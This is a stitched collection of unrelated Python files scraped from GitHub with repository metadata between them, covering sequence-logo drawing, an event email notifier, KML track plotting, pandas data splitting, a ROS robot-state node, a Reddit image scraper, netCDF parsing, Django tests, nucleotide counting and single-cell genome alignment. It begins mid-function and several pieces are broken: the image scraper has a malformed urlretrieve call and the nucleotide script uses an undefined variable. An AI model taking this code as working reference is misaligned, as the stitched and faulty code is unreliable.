L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
elif style == "refseq":
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="Arial")
L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
elif style == "growfade" or style == "grow":
# Grow the height of each letter based on binding
arrowpad_top = 3*bufferzoom
arrowpad_btm = 4*bufferzoom
arrowheight_padded = 0#arrowheight+arrowpad_top+arrowpad_btm
growheight = int((mid1-arrowheight_padded-refseq_height) * neg_colheights[j])
fademin = refseq_height
fademax = refseq_height+0.333*(mid1-arrowheight_padded-refseq_height)
zletterheight = refseq_height + growheight
fade = max(0, min(0.85, (fademax-zletterheight)/(fademax-fademin)))
letterimg = get_letterimg(translate[refseq[j]] if refseq else "N", zletterwidth, zletterheight, font="ArialBold")
if style == "growfade":
letterimg = letterimg*(1-fade) + 255*fade
mid0 = mid1-letterimg.shape[0]
L[mid0:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg[::-1,::] if complement else letterimg
"""
#aboveimg = make_lettercol(tape[:,j], (mid1-bufferzoom*2) * pos_colheights[j], reverse=True)
#intensity = max(0, min(1.0, (pos_colheights[j]-0.4*refseq_height/mid1)/(1.5*refseq_height/mid1)))
#aboveimg = aboveimg*intensity + 255*(1-intensity)
tapej = tape[:,j].copy()
tapej[tapej < 0.10*abs(tape).max()] = 0.0
#if pos_colheights[j] >= 0.15*max(pos_colheights.max(),neg_colheights[j].max()):
if np.any(tapej > 0):
aboveimg = make_lettercol(tapej, (mid1-bufferzoom*3) * pos_colheights[j], reverse=True)
aboveimg = np.minimum(255,aboveimg*0.61 + 255*0.4)
assert mid0-arrowheight-arrowpad_btm >= 0
assert mid0-arrowheight_padded-aboveimg.shape[0] >= 0
L[mid0-arrowheight-arrowpad_btm:mid0-arrowpad_btm,j*zletterwidth:(j+1)*zletterwidth,:] = uparrow_img
L[mid0-arrowheight_padded-aboveimg.shape[0]:mid0-arrowheight_padded,j*zletterwidth:(j+1)*zletterwidth,:] = aboveimg
#grey = aboveimg.mean(axis=2).reshape(aboveimg.shape[:2]+(1,))
#aboveimg[:,:,:] = np.minimum(255,grey.astype(np.float32)*160./grey.min())
#L[mid0-arrowpad_btm-aboveimg.shape[0]:mid0-arrowpad_btm,j*zletterwidth:(j+1)*zletterwidth,:] = aboveimg
"""
elif style == "bar":
assert refseq, "style topbar needs refseq"
# Put the refseq letter, with fixed height
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="Arial")
L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
# Draw a bar plot along the top based on neg_colheights
barheight = int((mid1-refseq_height-2*bufferzoom) * neg_colheights[j])
L[mid1-letterimg.shape[0]-barheight-2*bufferzoom:mid1-letterimg.shape[0]-2*bufferzoom,j*zletterwidth:(j+1)*zletterwidth,:] = np.array(barcolors[refseq[j]]).reshape((1,1,4))
elif style == "bars":
assert refseq, "style topbar needs refseq"
# Put the refseq letter, with fixed height
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="Arial")
L[mid1+2*bufferzoom:mid2-2*bufferzoom,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
# Draw a bar plot along the top based on neg_colheights
aboveheight = int(mid1 * neg_colheights[j])
belowheight = int(mid1 * pos_colheights[j])
L[mid1-aboveheight:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = np.array(barcolors[refseq[j]]).reshape((1,1,4))
L[mid2:mid2+belowheight,j*zletterwidth:(j+1)*zletterwidth,:] = np.array(barcolors[refseq[j]]).reshape((1,1,4))
else:
raise NotImplementedError("Unrecognzied style type")
if style in (None, "stack") and not refseq:
# Put a horizontal line across the middle of this logo
L[mid1:mid1+bufferzoom,:,:] = 100
if not positive_only:
L[mid2-bufferzoom:mid2,:,:] = 100
if not transparent:
L[:,:,3] = 255 # full opacity
# Rescale it down to the original requested size
L = np.array(Image.fromarray(L).resize((tapelen*letterwidth, height), Image.ANTIALIAS))
if complement:
L = L[::-1,:,:] # vertical flip
return L
|
jisraeli/DeepBind
|
code/libs/deepity/deepity/tape2logo.py
|
tape2logo.py
|
py
| 13,154
|
python
|
en
|
code
| 85
|
github-code
|
6
|
14038264100
|
from app.email_body import EmailBody
class User:
def __init__(self, name, nickname, email, locations):
self.name = name
self.nickname = nickname
self.email = email
self.locations = locations
self.artists = []
self.venues = []
self.promoters = []
self.email_body = EmailBody(name)
self.number_of_new_events = 0
def add_artist(self, artist_name, artist_tag):
self.artists.append({"name": artist_name, "tag": artist_tag})
def add_venue(self, venue_name, venue_tag):
self.venues.append({"name": venue_name, "tag": venue_tag})
def add_promoter(self, promoter_name, promoter_tag):
self.promoters.append({"name": promoter_name, "tag": promoter_tag})
def add_to_email(self, event):
if event.event_type == "venue":
if any(venue["name"] == event.venue for venue in self.venues):
self.email_body.add_venue_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
elif event.event_type == "artist":
if any(artist["name"] == event.artist for artist in self.artists):
if not self.locations: # notify if no location preference specified
self.email_body.add_artist_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
return
for location in self.locations: # notify if location preference matches
if location in event.venue:
self.email_body.add_artist_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
elif event.event_type == "promoter":
if any(promoter["name"] == event.promoter for promoter in self.promoters):
self.email_body.add_promoter_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
def add_email_ending(self):
venues_list = ", ".join(venue["name"] for venue in self.venues)
artists_list = ", ".join(artist["name"] for artist in self.artists)
promoters_list = ", ".join(promoter["name"] for promoter in self.promoters)
if not self.locations:
locations_list = "Worldwide"
else:
locations_list = ", ".join(self.locations)
self.email_body.add_ending(
venues_list, artists_list, promoters_list, locations_list
)
|
polyccon/ra-events-notifier
|
app/user.py
|
user.py
|
py
| 2,621
|
python
|
en
|
code
| 1
|
github-code
|
6
|
43243820127
|
from PyQt5.QtCore import QThread, pyqtSignal
from simplekml import Kml, Snippet, Types
from math import radians, cos, sin, asin, degrees, atan2
import os
class PlotFiles(QThread):
progressSignal = pyqtSignal(int)
threadMessage = pyqtSignal(str)
def __init__(self, results, issilist, google, gps):
QThread.__init__(self)
self.gps = gps
self.results = results
self.issilist = issilist
self.google = google
self.maxRange = len(self.issilist)
self.stopped = 0
def __del__(self):
self.wait()
def plot_the_files(self, results, issi, google, gps, firstplot):
"""
Receives the results and an issi's to plot
:param firstplot:
:param gps:
:param google:
:param results:
:param issi:
:return:
"""
when = []
coord = []
speeds = []
headings = []
times = []
year = results[issi][0][1][6:10]
month = results[issi][0][1][3:5]
day = results[issi][0][1][0:2]
kml = Kml(name="{}_{}-{}-{}".format(issi, year, month, day), open=1)
doc = kml.newdocument(name="{}".format(issi),
snippet=Snippet('Created {}-{}-{}'.format(year, month, day)))
for x in range(0, len(results[issi])):
tup = (results[issi][x][3], results[issi][x][2])
theTime = results[issi][x][1][11:]
when.append("{}-{}-{}T{}Z".format(year, month, day, theTime))
coord.append(tup)
speeds.append(int(results[issi][x][4]))
headings.append(int(results[issi][x][5]))
times.append(results[issi][x][1])
# Create circle track
if gps[0] != 0 and firstplot:
R = 6378.1
d = float(gps[2]) # distance
circle_coords = []
lat1 = radians(float(gps[0]))
lon1 = radians(float(gps[1]))
for b in range(1, 360):
brng = radians(b)
lat2 = asin(sin(lat1) * cos(d / R) + cos(lat1) * sin(d / R) * cos(brng))
lon2 = lon1 + atan2(sin(brng) * sin(d / R) * cos(lat1), cos(d / R) - sin(lat1) * sin(lat2))
lat2 = degrees(lat2)
lon2 = degrees(lon2)
circle_coords.append((lon2, lat2))
doc2 = kml.newdocument(name="Search Area",
snippet=Snippet('{}-{}-{}'.format(gps[0], gps[1], gps[2])))
fol2 = doc2.newfolder(name='Search Area')
trk2 = fol2.newgxtrack(name='search area')
trk2.newgxcoord(circle_coords)
trk2.stylemap.normalstyle.linestyle.color = '641400FF'
trk2.stylemap.normalstyle.linestyle.width = 6
# Folder
fol = doc.newfolder(name='Tracks')
# schema for extra data
schema = kml.newschema()
schema.newgxsimplearrayfield(name='speed', type=Types.int, displayname='Speed')
schema.newgxsimplearrayfield(name='heading', type=Types.int, displayname='Heading')
schema.newgxsimplearrayfield(name='time', type=Types.string, displayname='Time')
# New Track
trk = fol.newgxtrack(name=issi)
# Apply Schema
trk.extendeddata.schemadata.schemaurl = schema.id
# add all info to track
trk.newwhen(when)
trk.newgxcoord(coord)
trk.extendeddata.schemadata.newgxsimplearraydata('time', times)
trk.extendeddata.schemadata.newgxsimplearraydata('speed', speeds)
trk.extendeddata.schemadata.newgxsimplearraydata('heading', headings)
# Styling
trk.stylemap.normalstyle.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/track.png'
trk.stylemap.normalstyle.linestyle.color = '99ffac59'
trk.stylemap.normalstyle.linestyle.width = 6
trk.stylemap.highlightstyle.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/track.png'
trk.stylemap.highlightstyle.iconstyle.scale = 1.2
trk.stylemap.highlightstyle.linestyle.color = '99ffac59'
trk.stylemap.highlightstyle.linestyle.width = 8
kml.save("results/{}_{}-{}-{}.kml".format(issi, year, month, day))
if google:
try:
os.system("start " + "results/{}_{}-{}-{}.kml".format(issi, year, month, day))
except:
pass
def run(self):
firstplot = 1
maxPercent = len(self.issilist)
for i in range(len(self.issilist)):
if not self.stopped:
self.plot_the_files(self.results, self.issilist[i], self.google, self.gps, firstplot)
update = ((i + 1) / maxPercent) * 100
self.progressSignal.emit(update)
if firstplot:
self.sleep(4)
firstplot = 0
else:
break
self.threadMessage.emit('Plotting completed')
def stop(self):
self.stopped = 1
self.threadMessage.emit('Plotting stopped')
|
stephenmhall/Coordinator_parser
|
plotfile.py
|
plotfile.py
|
py
| 5,066
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73712875067
|
import pandas as pd
import os
def splitByDay():
for num in range(1,9,1):
print("now is working in---"+"HO_",num,".csv")
print('\n')
#df=pd.read_csv("HO_{}.csv".format(str(num) ) )
data_train=pd.read_csv("I:\Anacoda3\AcondaProject\dataOfOrderAnalysis\HO_{}.csv".format(str(num) ) )
data_train['dates'] = pd.to_datetime(data_train['dates'])
df = data_train.set_index('dates')
year='2017'
Month=df['month']
Day=df['day']
monthMin=Month.min()
monthMax=Month.max()
dayMin=Day.min()
dayMax=Day.max()
spl(df,year,monthMin,monthMax,dayMin,dayMax)
def spl(df,year,monthMin,monthMax,dayMin,dayMax):
df=df
year=year
monthMin=monthMin
monthMax=monthMax
dayMin=dayMin
dayMax=dayMax
for month in range(monthMin,monthMax+1,1):
if month==6 or month==9:
dayMax=30
for day in range(dayMin,dayMax+1,1):
date=year+'-'+ str(month)+'-'+ str(day)
#date='2017-8-{}'.format( str( day))
print(date)
a=df[date]
print('\n')
for column in list(a.columns[a.isnull().sum() > 0]):
mean_val = a[column].mean()
a[column].fillna(mean_val, inplace=True)
#I:\Anacoda3\AcondaProject\dataOfOrderAnalysis\subList\
a=a.reset_index(drop = True)
columns=['type','start_dest_distance', 'arrive_time', 'departure_time', 'pre_total_fee', 'normal_time']
a=a[columns]
filename = '{}.csv'.format( str(date) )
print('now is split --- '+filename )
mergeOrJustWrite(a,filename)
#a.to_csv(filename)
print('save '+filename+' over!' )
print('\n')
def mergeOrJustWrite(a,filenameBeChecked):
a=a
samefilename=filenameBeChecked
#path='I:/Anacoda3/AcondaProject/dataOfOrderAnalysis/subList'
path='I:/Anacoda3/AcondaProject/dataOfOrderAnalysis/subList/tomysqlFinished'
#os.getcwd()
#os.chdir(path)
files = file_name(path)
# for fname in files:
# print(fname)
if str(samefilename) in files:
print(samefilename+' already exist!')
a.to_csv('{}/re/{}'.format( path,str( samefilename)))
#os.chdir(path)
else:
print('a new file!')
a.to_csv('{}/{}'.format( path,str ( samefilename)))
def file_name(file_dir):
for root, dirs, files in os.walk(file_dir):
return files
#print(root) #ๅฝๅ็ฎๅฝ่ทฏๅพ
#print(dirs) #ๅฝๅ่ทฏๅพไธๆๆๅญ็ฎๅฝ
#print(files) #ๅฝๅ่ทฏๅพไธๆๆ้็ฎๅฝๅญๆไปถ
if __name__ == "__main__":
splitByDay()
|
jasscical/pythonLearning
|
06_ๆๆฏๅคฉๅๆ184ๅผ ่กจ.py
|
06_ๆๆฏๅคฉๅๆ184ๅผ ่กจ.py
|
py
| 3,149
|
python
|
en
|
code
| 0
|
github-code
|
6
|
7847083907
|
#!/usr/bin/env python
"""
.. module::robot_state
:platform: Unix
:synopsis: Python module for the state machine
ROS node which keeps track of the robot pose and battery status.
Being a simpler version, for the documentation please refer to `the original code <https://github.com/buoncubi/arch_skeleton>`_
"""
import rospy
import random
import threading
import time
from std_msgs.msg import String, Bool
from assignment_1.msg import Point
from assignment_1.srv import GetPose, GetPoseResponse, SetPose, SetPoseResponse
class RobotState:
def __init__(self):
# Initialise this node
rospy.init_node('robot_state')
# Initialise robot position.
self._pose = Point(x=0.0, y=0.0)
# Initialise battery level
self._battery_low = False
print('robot_state')
# Initialise randomness
self._random_battery_time = rospy.get_param("/battery_time", [15.0, 40.0])
# Define services
rospy.Service("/get_pose", GetPose, self.get_pose)
rospy.Service("/set_pose", SetPose, self.set_pose)
# Start publisher on a separate thread
th = threading.Thread(target=self._battery_status)
th.start()
def set_pose(self, request):
if request.pose is not None:
self._pose = request.pose
else:
rospy.logerr('Cannot set an unspecified robot position')
return SetPoseResponse()
def get_pose(self, request):
response = GetPoseResponse()
response.pose = self._pose
return response
def _battery_status(self):
# Define a publisher
pub = rospy.Publisher('battery_status', Bool, queue_size=1)
while not rospy.is_shutdown():
# Publish battery level
pub.publish(Bool(self._battery_low))
# Wait for simulate battery usage.
delay = random.uniform(self._random_battery_time[0], self._random_battery_time[1])
rospy.sleep(delay)
# Change battery state.
self._battery_low = not self._battery_low
if __name__ == "__main__":
# Instantiate the node manager class and wait
RobotState()
rospy.spin()
|
SamueleD98/assignment_1
|
scripts/robot_state.py
|
robot_state.py
|
py
| 2,198
|
python
|
en
|
code
| 0
|
github-code
|
6
|
32381382238
|
import string
import os
import random
import bs4
from urllib import request
url = "http://reddit.com"
urlPage = request.urlopen(url).read()
soup = bs4.BeautifulSoup(urlPage, "html.parser")
img_list = []
for img in soup.find_all('img'):
img_item = str(img.get('src')).split('//')
img_list.append(img_item[1])
#print(img_list)
r = 8
all_chars = string.ascii_letters
# replace this folder_address variable to the directory which you wish to save
# the image files on your computer
folder_address = "C:\\Users\\User\\Documents\\Codes\\Python Scripts\\Reddit\\Pics\\"
for item in img_list:
request.urlretrieve("http://" + item,
+ ''.join(random.choice(all_chars) for x in range(0, r)) + ".jpg")
print("finished downloading images")
|
techreign/Webscraping
|
ImageScraper.py
|
ImageScraper.py
|
py
| 739
|
python
|
en
|
code
| 0
|
github-code
|
6
|
27520740533
|
import os
import datetime
import netCDF4
def handle_netcdf_scheme_wrf(var_names, file_name, run, model, st):
# try:
if os.path.exists(file_name):
data_list = []
file = netCDF4.Dataset(file_name)
var1 = file.variables[var_names[0]][:]
var2 = file.variables[var_names[1]][:]
times = file.variables["Times"][:].astype("str")
var_latlon = (file.variables["XLAT"][0, :, :],
file.variables["XLONG"][0, :, :])
file.close()
# file de log
log = open(st["ensemble_log_directory"][0] +
"Loaded_%s_%s.log" %
(model, run.strftime("%Y%m%d%H")), 'w')
for t in range(times.shape[0]):
var_date = datetime.datetime.strptime(
"".join(list(times[t])), "%Y-%m-%d_%H:00:00")
if var_date <= (st['run'][0] +
datetime.
timedelta(hours=int(st['hours_ensemble'][0]))):
var_value = var1[t, :, :] + var2[t, :, :]
accumulation = t
if t == 0:
data_list.append((model,
run,
var_date,
(var_value, accumulation),
"latlon", var_latlon))
else:
data_list.append((model,
run,
var_date,
(var_value, accumulation)))
log.write("run: %s --- Data: %s --- file: %s \n" %
(run.strftime("%Y%m%d%H"),
var_date.strftime("%Y%m%d%H"), file_name))
log.close()
return data_list
# except:
# return None
|
RevertonLuis/Ensemble
|
lib/handle_netcdfs.py
|
handle_netcdfs.py
|
py
| 2,022
|
python
|
en
|
code
| 1
|
github-code
|
6
|
10502966682
|
from rest_framework.test import APITestCase
from ...services.notification_service import NotificationService
from django.urls import reverse
class TestNotificationAPI(APITestCase):
def setUp(self):
self.payload = {
"title": "Winter discount sale started",
"description": "Enter coupon-code to get flat 10% discount"
}
self.notification_id = NotificationService().create(self.payload).id
self.url = reverse("notification")
def test_create_notification(self):
data = {
"title": "Summer discount sale started",
"description": "Enter coupon-code to get flat 10% discount"
}
notification = self.client.post(self.url, data=data, format='json')
self.assertEqual(notification.data.get('title'), data.get('title'))
def test_get_all_notification(self):
notification = self.client.get(self.url)
self.assertNotEqual(len(notification.data), 0)
def test_get_notification_by_id(self):
notification = NotificationService().get_by_id(self.notification_id)
self.assertEqual(notification.id, self.notification_id)
def test_delete_notification_by_id(self):
response = self.client.delete(self.url+"?id={}".format(self.notification_id), data={}, format='json')
self.assertEqual(response.data.get('success'), True)
|
anojkr/onboarding-project
|
push_notification/apps/notification/tests/unit/test_notification.py
|
test_notification.py
|
py
| 1,381
|
python
|
en
|
code
| 0
|
github-code
|
6
|
43447073770
|
import sys, re
from argparse import ArgumentParser
parser = ArgumentParser(description = 'Calculate the percentage of each nucleotide in the sequence')
parser.add_argument("-s", "--seq", type = str, required = True, help = "Input sequence")
args = parser.parse_args()
seq = seq.upper()
if re.search('^[ACGTU]+$', args.seq):
u= seq.count("U") #this counts the U Percentage
a= seq.count("A") #this counts the A Percentage
c= seq.count("C") #this counts the C Percentage
t= seq.count("T") #this counts the T Percentage
g= seq.count("G") #this counts the G Percentage
u_content= (u/len(seq)) * 100 #Calculate the U percentage
a_content= (a/len(seq)) * 100 #Calculate the A percentage
c_content= (c/len(seq)) * 100 #Calculate the C percentage
t_content= (t/len(seq)) * 100 #Calculate the T percentage
g_content= (g/len(seq)) * 100 #Calculate the G percentage
print (f"The % of U in sequence is: {u_content}") #Print the U Percentage
print (f"The % of A in sequence is: {a_content}") #Print the A Percentage
print (f"The % of C in sequence is: {c_content}") #Print the C Percentage
print (f"The % of T in sequence is: {t_content}") #Print the T Percentage
print (f"The % of G in sequence is: {g_content}") #Print the G Percentage
else:
print ('The sequence is not DNA or RNA')
|
stepsnap/git_HandsOn
|
Percentage.py
|
Percentage.py
|
py
| 1,350
|
python
|
en
|
code
| 0
|
github-code
|
6
|
44855918296
|
class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
if num < 0:
return [0]
ans = []
for i in range(0,num+1):
ans.append(len(bin(i)[2:].replace('0','')))
return ans
|
sandeepjoshi1910/Algorithms-and-Data-Structures
|
countbits.py
|
countbits.py
|
py
| 308
|
python
|
en
|
code
| 0
|
github-code
|
6
|
4582056106
|
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from scipy import stats
import collections
import time
from sklearn import cluster
from sklearn.metrics import adjusted_rand_score
import scipy as sp
from tqdm import tqdm
from sklearn.manifold import MDS
from run_dist_mat import *
from scipy.cluster.hierarchy import dendrogram, linkage
import itertools
from mpl_toolkits.mplot3d import Axes3D
from multiprocessing import Pool
from itertools import repeat
def get_sex_of_cell(cell_data):
assert cell_data.loc[cell_data.chr == 20].shape[0] > 1, print("data matrix must have sex chromosomes")
if cell_data.loc[cell_data.chr == 21].shape[0] > 1: return 'm' ##check this
else: return 'f'
def make_groups_by_bins(cell_data, bin_size, cum_lens, include_sex_chromosomes = False):
if include_sex_chromosomes == False:
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs = 19)
num_bins = np.sum(list(num_bins_per_chr.values()))
cell_data = cell_data.loc[cell_data.chr < 20].copy()
cell_data['abs_pos'] = -1
cell_data['abs_pos'] = cell_data.pos.copy() + [cum_lens[ch-1] for ch in cell_data.chr] #encodes the absolute position of the reads along the linear genome
groups = cell_data.groupby([pd.cut(cell_data.abs_pos, bins),pd.cut(cell_data.pckmeans_cluster, [-0.1,0.9,2])]).mean().reindex(pd.MultiIndex.from_product([bins[1:], [0,1]]), fill_value = np.nan)
assert groups.shape[0] == 2 * num_bins
return groups
elif include_sex_chromosomes == True:
cell_data = cell_data.loc[cell_data.chr < 22].copy()
if get_sex_of_cell(cell_data) == 'f':
print("female cell")
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs = 20)
autosome_num_bins = np.sum(list(num_bins_per_chr.values())[0:20]) #sum of all autosome chromosomes
x_num_bins = num_bins_per_chr[20]
cell_data = cell_data.loc[cell_data.chr != 21] #getting rid of the noisy y chromosome reads
assert cell_data.loc[cell_data.chr == 20, 'pckmeans_cluster'].unique().shape[0] == 2, "x chromosome must have 2 clusters"
assert cell_data.loc[cell_data.chr == 21, 'pckmeans_cluster'].unique().shape[0] == 0, "y chromosome must have no clusters"
cell_data['abs_pos'] = -1
cell_data['abs_pos'] = cell_data.pos.copy() + [cum_lens[ch-1] for ch in cell_data.chr] #encodes the absolute position of the reads along the linear genome
groups = cell_data.groupby([pd.cut(cell_data.abs_pos, bins),pd.cut(cell_data.pckmeans_cluster, [-0.1,0.9,2])]).mean().reindex(pd.MultiIndex.from_product([bins[1:], [0,1]]), fill_value = np.nan)
assert groups.shape[0] == 2 * autosome_num_bins + x_num_bins
return groups
else: #male cells
assert cell_data.loc[cell_data.chr == 20, 'pckmeans_cluster'].unique().shape[0] == 1, "x chromosome must have 2 clusters in male embryo"
assert cell_data.loc[cell_data.chr == 21, 'pckmeans_cluster'].unique().shape[0] == 1, "y chromosome must have 2 clusters in male embryo"
cell_data['abs_pos'] = -1
cell_data['abs_pos'] = cell_data.pos.copy() + [cum_lens[ch-1] for ch in cell_data.chr] #encodes the absolute position of the reads along the linear genome
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs = 21)
autosome_num_bins = np.sum(list(num_bins_per_chr.values())[0:20]) #sum of all autosome chromosomes
x_num_bins = num_bins_per_chr[20]
y_num_bins = num_bins_per_chr[21]
autosome_bins = bins[0:autosome_num_bins+1]
x_bins = bins[autosome_num_bins: autosome_num_bins+x_num_bins+1]
y_bins = bins[autosome_num_bins+x_num_bins:]
autosome_chrs = cell_data.loc[cell_data.chr <= 19]
x_chr = cell_data.loc[cell_data.chr == 20]
y_chr = cell_data.loc[cell_data.chr == 21]
autosome_chr_groups = autosome_chrs.groupby([pd.cut(autosome_chrs.abs_pos, autosome_bins),pd.cut(autosome_chrs.pckmeans_cluster, [-0.1,0.9,2])]).mean().reindex(pd.MultiIndex.from_product([autosome_bins[1:], [0,1]]), fill_value = np.nan)
x_chr_groups = x_chr.groupby([pd.cut(x_chr.abs_pos, x_bins),pd.cut(x_chr.pckmeans_cluster, [-0.5,0.5])]).mean().reindex( pd.MultiIndex.from_product([x_bins[1:], [0]]), fill_value = np.nan)
y_chr_groups = y_chr.groupby([pd.cut(y_chr.abs_pos, y_bins),pd.cut(y_chr.pckmeans_cluster, [-0.5,0.5])]).mean().reindex(pd.MultiIndex.from_product([y_bins[1:], [0]]), fill_value = np.nan)
groups = pd.concat([autosome_chr_groups,x_chr_groups, y_chr_groups], axis = 0)
assert groups.shape[0] == 2 * autosome_num_bins + x_num_bins + y_num_bins
return groups
else:
raise ValueError
print("please indicate whether sex chromosomes should be included or not")
def get_inter_cell_dist(m0,m1):
n = m0.shape[0]
k = 1 #we don't want to include the diagonal for the 38x38 representations!!!! b/c the 0s on the diagonal artifically raise the correlation value!
ut_ind = np.triu_indices(n, k)
assert ut_ind[0].shape[0] == n*(n-1)/2
m0_unrav = m0[ut_ind] #len is n*(n+1)/2
m1_unrav = m1[ut_ind]
#find indices where both unraveled matrices are not nan
filt = (np.isnan(m0_unrav)+np.isnan(m1_unrav))==0
#reduce the matrices to only indices that are not nan for both
m0_filt = m0_unrav[filt]
m1_filt = m1_unrav[filt]
#if the two matrices share one or no indices that are not nan, return nan. Otherwise, findn the pearson correlation.
if sum(~np.isnan(m0_filt))<=1:
r=np.nan
else:
#get pearson's r
r = sp.stats.pearsonr(m0_filt,m1_filt)[0]
return 1 - r, np.sum(filt) #r is the correlation, len(filt) is the size of the intersection
"""wrapper (utility) function. using this to do data parallelism"""
def align_cell_i(cell_id_i, bin_size, sample_from_bin):
# random_state = 500
num_samples = 50
print("aligning cell {}".format(cell_id_i))
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs)
cell_i = data.loc[(data.cell_index==cell_id_i) & (data.chr <= num_chrs)].copy()
#encodes the absolute position of the reads along the linear genome--> used for binning
cell_i['abs_pos'] = -1
cell_i['abs_pos'] = cell_i.pos.copy() + [cum_lens[ch-1] for ch in cell_i.chr]
cell_i_dist_mat, _ = pckmeans_get_dist_mat_binned(cell_i, bins, num_bins_per_chr, sample_from_bin)
cell_i_dists = []
cell_i_intersection_sizes = []
cids_after_i = data.loc[data.cell_index >= cell_id_i, 'cell_index'].unique()
for cell_id_j in cids_after_i:
cell_j = data.loc[(data.cell_index==cell_id_j) & (data.chr <= num_chrs)].copy()
cell_j['abs_pos'] = -1
cell_j['abs_pos'] = cell_j.pos.copy() + [cum_lens[ch-1] for ch in cell_j.chr]
cell_j_dist_mat, _ = pckmeans_get_dist_mat_binned(cell_j, bins, num_bins_per_chr, sample_from_bin)
cell_j_dists = []
cell_j_intersection_sizes = []
for sample in range(num_samples): #in order to align cell j with cell i, we run the sequential algorithm on 50 random sequences
order = np.arange(1,20)
np.random.shuffle(order)
#bit_seq is something like x = [0,1,1,1,0,...] of length 19 where x[i]=0 means that in cell j we don't swap the copies of chromosome i. #bin_seq is something like [23,24,12,11,...] which has the actual sequnce of the aligned bins
(dist, intersection_size), bit_seq, bin_seq, _ = get_aligned_inter_cell_dist(cell_i_dist_mat, cell_j_dist_mat, num_bins_per_chr, chr_seq = order) #np.arange(19,0,-1)
cell_j_dists.append(dist)
cell_j_intersection_sizes.append(intersection_size)
cell_i_dists.append(np.min(cell_j_dists))
cell_i_intersection_sizes.append(cell_j_intersection_sizes[np.argmin(cell_j_dists)])
np.save("data/temp/aligned_dist_{}_bin_size_{}_{}_numchrs_{}_cell{}.npy".format(reads_to_include, int(bin_size/1e6), sample_from_bin, num_chrs, cell_id_i),np.array(cell_i_dists))
np.save("data/temp/aligned_dist_{}_intersection_size_bin_size_{}_{}_numchrs_{}_cell{}.npy".format(reads_to_include, int(bin_size/1e6), sample_from_bin, num_chrs, cell_id_i),np.array(cell_i_intersection_sizes))
return
def read_data(clustering_method, reads_to_inlcude):
if clustering_method == "igs":
data = pd.read_csv('data/embryo_data.csv')
data = data.loc[~data.cell_index.isin([ 80., 84., 105., 113.])] #getting rid of cells with less than 150 reads
if reads_to_inlcude == "inliers":
data = data.loc[data.inlier == 1]
elif clustering_method == "pckmeans":
data = pd.read_csv('data/pckmeans_embryo_data.csv')
data = data.loc[~data.cell_index.isin([ 80., 84., 105., 113.])]
if reads_to_inlcude == "inliers":
data = data.loc[data.outlier == 0]
return data
#the order of chromosomes to consider is 0,1,2,3...
"""
finds the best chromosome alignment sequentially, for now considering the chromosomes in the order chr_seq
num_bins_per_chr: dictionary holding the number or bins for each chromosome (first element is 0:0)
{0: 0,
1: 2,
2: 2,
3: 2,
4: 2,
5: 2,...}
num_chrs: the number of chromosomes to align
assumes the distance matrices to have the following order:
chr 1 cluster 0 bin 1
chr 1 cluster 0 bin 2
chr 1 cluster 1 bin 1
chr 1 cluster 1 bin 2
...
chr 19 cluster 0 bin 1
chr 19 cluster 0 bin 2
chr 19 cluster 1 bin 1
chr 19 cluster 1 bin 2
"""
def get_aligned_inter_cell_dist(cell_i_dist, cell_j_dist, num_bins_per_chr, num_chrs= 19,
chr_seq = None, visualize = False):
if chr_seq is None:
print("default chromosome sequence")
chr_seq = np.arange(1,20)
if visualize: fig, axes = plt.subplots(num_chrs,2, figsize = (7,15))
total_haploid_bins = np.sum([val for key,val in num_bins_per_chr.items()][:num_chrs+1]) #total number of bins for the first num_chrschromosomes
cum_num_bins = np.cumsum([val for key,val in num_bins_per_chr.items()]) #[0,bins_chr1, bins_chr1+chr2,...] HAPLOID number of bins
cell_i_seq = []
cell_j_seq = []
bit_wise_seq = {} # i: 0 --> chromosome i hasn't been switched, 1 means it has been switched
for i in chr_seq:
i = int(i)
if visualize:
sns.heatmap(cell_i_dist_subset, square = True, ax = axes[i,0], vmin = 0, vmax = 22, cbar = False)
sns.heatmap(cell_j_dist_subset, square = True, ax = axes[i,1], vmin = 0, vmax = 22, cbar = False)
cell_i_seq = cell_i_seq + list(np.arange(2*cum_num_bins[i-1], 2*cum_num_bins[i-1] + 2*num_bins_per_chr[i])) #this is the default sequence where we don't touch the order of copies
seq1 = cell_j_seq + list(np.arange(2*cum_num_bins[i-1], 2*cum_num_bins[i-1] + 2*num_bins_per_chr[i]))
seq2 = cell_j_seq + list(np.arange(2*cum_num_bins[i-1] + num_bins_per_chr[i], 2*cum_num_bins[i-1] + 2*num_bins_per_chr[i])) +\
list(np.arange(2*cum_num_bins[i-1] , 2*cum_num_bins[i-1] + num_bins_per_chr[i]))
dist1, inter_size1 = get_inter_cell_dist(cell_i_dist[np.ix_(cell_i_seq, cell_i_seq)], cell_j_dist[np.ix_(seq1, seq1)])
dist2, inter_size2 = get_inter_cell_dist(cell_i_dist[np.ix_(cell_i_seq, cell_i_seq)], cell_j_dist[np.ix_(seq2, seq2)])
# print(seq1, seq2)
if dist1 <= dist2:
bit_wise_seq[i] = 0
cell_j_seq = seq1
elif dist2 < dist1:
bit_wise_seq[i] = 1
cell_j_seq = seq2
else: #dists will be nan when we only have one value in each distance matrix
cell_j_seq = seq1
bit_wise_seq[i] = 0
